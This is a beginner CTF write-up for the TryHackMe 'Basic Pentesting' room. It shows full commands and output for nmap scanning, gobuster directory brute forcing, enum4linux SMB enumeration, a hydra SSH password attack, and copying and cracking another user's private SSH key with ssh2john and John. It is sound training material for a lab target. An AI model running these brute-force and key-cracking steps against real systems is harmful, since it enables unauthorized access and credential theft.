Basic Pentesting - THM Write-Up

Basic Pentesting - THM Write-Up

Difficulty - Easy

Description from THM

This is a machine that allows you to practice web app hacking and privilege escalation.

This is a beginner friendly room on TryHackMe. There are several tasks in this CTF that needs to be completed, which I'll answer them along the way. The purpose of this machine is to learn brute forcing, hash cracking, service enumeration, and Linux enumeration.


Tools

  • Nmap
  • gobuster
  • enum4linux
  • ssh2john
  • John the Ripper

Task 1

This task is to just deploy the machine and connect to the THM network.

Task 2

The first thing we're going to do is run an Nmap scan of the target machine to find what services are running on it.

nmap -sC -sV -oA basic 10.10.195.240

Starting Nmap 7.60 ( https://nmap.org ) at 2022-03-12 04:57 GMT
Nmap scan report for ip-10-10-195-240.eu-west-1.compute.internal (10.10.195.240)
Host is up (0.0015s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
|   256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_  256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (EdDSA)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http        Apache Tomcat 9.0.7
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.7
MAC Address: 02:37:12:F3:96:43 (Unknown)
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

There are several open ports:

  • Port 22 - SSH
  • Port 80 - HTTP (Apache httpd 2.4.18)
  • Port 139 & 445 - SMB
  • Port 8009 - ajp13 (Apache Jserv)
  • Port 8080 - HTTP (Apache Tomcat)

They are all pretty interesting, but for now let's focus on the web service first on Port 80 and see what we can find.

Task 3

For this task, we'll need to find the hidden directory on the web server.

If we try to go to the webpage, all we see is a message that says "Undergoing maintenance": image.png

To find the hidden directories, we'll use a tool called gobuster. It is used to look for directories and files on a website using brute force.

To use gobuster, I'm going to run the following command:

gobuster dir -u http://<ip>:80 -w /usr/share/wordlist/dirb/common.txt

  • gobuster - starts the tool
  • dir - used to bruteforce directory/files
  • -u - the target URL
  • -w - path to the wordlist
gobuster dir -u http://10.10.195.240:80 -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.195.240:80
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2022/03/12 05:24:34 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/development (Status: 301)
/index.html (Status: 200)
/server-status (Status: 403)
===============================================================
2022/03/12 05:24:34 Finished
===============================================================

All the directories besides /development and /index.html are forbidden (Status: 403 means that it is forbidden). index.html is just the main page we saw that said "Undergoing maintenance". This leaves us with /development to explore.

image.png

As we can see, there are two text files on the page. If we click on dev.txt we get this, which looks to be some developer's notes. Seems as though there are two people communicating with each other using this text file. Someone with the initials of K and J:

image.png

With further inspection, the person with the initial "K" was messing around with struts and that they are using version 2.5.12. If we google struts 2.5.12, the first result shows an exploit from exploitdb! It is called:

Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution

We'll keep this in mind, because this is useful information. Now, let's check the other text file, j.txt:

image.png

It's a message from "K" to "J", telling them to fix the weak credentials in the /etc/shadow file.

Tasks 4-7

We've discovered quite a bit by enumerating the web server, but let's continue. We still need to try and enumerate smb (samba).

A tool that we can use to enumerate smb is enum4linux. It is used to enumerate data from Windows and Samba hosts. We can use the following command:

enum4linux <machine ip>

After we run enum4linux, we can go through it and see what we can find that is useful.

image.png

We found two users kay and jan. This explains the "K" and "J" in the text files earlier. Now we need to figure out the password of the two users found. Let's use hydra to brute force the user's password by using a dictionary attack.

Also, make note from earlier, Kay told Jan that their password is weak. So, we can assume that Jan has a weak password that we can hopefully find using hydra.

We'll use the following command (it will take a bit to complete):

hydra -t 4 -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.195.240

  • hydra - starts the tool
  • -t - sets the thread to 6
  • -l - sets user (in this case jan)
  • -P - path to wordlist
  • ssh:// - remember from the nmap scan the target is running ssh. So, this will brute force the ssh login.
[22][ssh] host: 10.10.195.240   login: jan   password: <password here>

I've omitted the password because I believe in attempting it yourself. If you've done the enumerating and scans correctly you should get the same results.

We have the password, so let's trying logging in with SSH using our newly found credentials.

We will use the following command to login:

ssh jan@<ip>

jan@basic2:~$ whoami
jan

Tasks 8-11

We'll need to further enumerate the machine to find any vectors for privilege escalation.

Let's look around and see what we can find.

jan@basic2:~$ ls -la
total 12
drwxr-xr-x 2 root root 4096 Apr 23  2018 .
drwxr-xr-x 4 root root 4096 Apr 19  2018 ..
-rw------- 1 root jan    47 Apr 23  2018 .lesshst
jan@basic2:~$ cd ..
jan@basic2:/home$ ls
jan  kay
jan@basic2:/home$ cd kay
jan@basic2:/home/kay$ ls -la
total 48
drwxr-xr-x 5 kay  kay  4096 Apr 23  2018 .
drwxr-xr-x 4 root root 4096 Apr 19  2018 ..
-rw------- 1 kay  kay   756 Apr 23  2018 .bash_history
-rw-r--r-- 1 kay  kay   220 Apr 17  2018 .bash_logout
-rw-r--r-- 1 kay  kay  3771 Apr 17  2018 .bashrc
drwx------ 2 kay  kay  4096 Apr 17  2018 .cache
-rw------- 1 root kay   119 Apr 23  2018 .lesshst
drwxrwxr-x 2 kay  kay  4096 Apr 23  2018 .nano
-rw------- 1 kay  kay    57 Apr 23  2018 pass.bak
-rw-r--r-- 1 kay  kay   655 Apr 17  2018 .profile
drwxr-xr-x 2 kay  kay  4096 Apr 23  2018 .ssh
-rw-r--r-- 1 kay  kay     0 Apr 17  2018 .sudo_as_admin_successful
-rw------- 1 root kay   538 Apr 23  2018 .viminfo

Kay's files look promising! Let's continue to look through.

jan@basic2:/home/kay$ cd .ssh
jan@basic2:/home/kay/.ssh$ ls
authorized_keys  id_rsa  id_rsa.pub

Looking in the .ssh folder we can see there is Kay's public key. We can copy the key and attempt to crack it using John the Ripper, however, we'll need to specifically use ssh2john first. This is because we need to convert the id_rsa file to hash format so we can use it with john.

We'll use the following command to convert id_rsa to hash format (my file location may be different from yours. I'm using the THM AttackBox for this, so it might be different on Kali or you'll need to install it):

python3 /opt/john/ssh2john.py id_rsa > id_rsa.hash

Now we can run john:

john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash 

<password here>          (id_rsa)
1g 0:00:00:09 DONE (2022-03-12 06:51) 0.1086g/s 1558Kp/s 1558Kc/s 
Session completed.

We have Kay's password! Let's login as Kay now.

jan@basic2:/home/kay/.ssh$ ssh -i id_rsa kay@10.10.195.240
Could not create directory '/home/jan/.ssh'.
The authenticity of host '10.10.195.240 (10.10.195.240)' can't be established.
ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/jan/.ssh/known_hosts).
Enter passphrase for key 'id_rsa':

Where it says Enter passphrase, we'll enter the one we just found for Kay. After doing so, we now have access as Kay.

kay@basic2:~$ whoami
kay
kay@basic2:~$ ls
pass.bak
kay@basic2:~$ cat pass.bak 
<final password here>

We're done! We found the final password!

Summary

After solving this TryHackMe machine we learned how to scan our target machine to look for any services that were running on it. We used what we found to enumerate the web server, SMB, and SSH. We got a chance to use brute forcing tools to continute enumerating the target machine. The vulnerabilities we discovered were that Apache Struts, however, we didn't end up dealing with that, but that was a cool find. We also discovered text files that weren't for our eyes to see. Then, we dealt with weak passwords, which gave us a chance to practice password cracking. In the end, using the information we found we were able to escalate our privileges.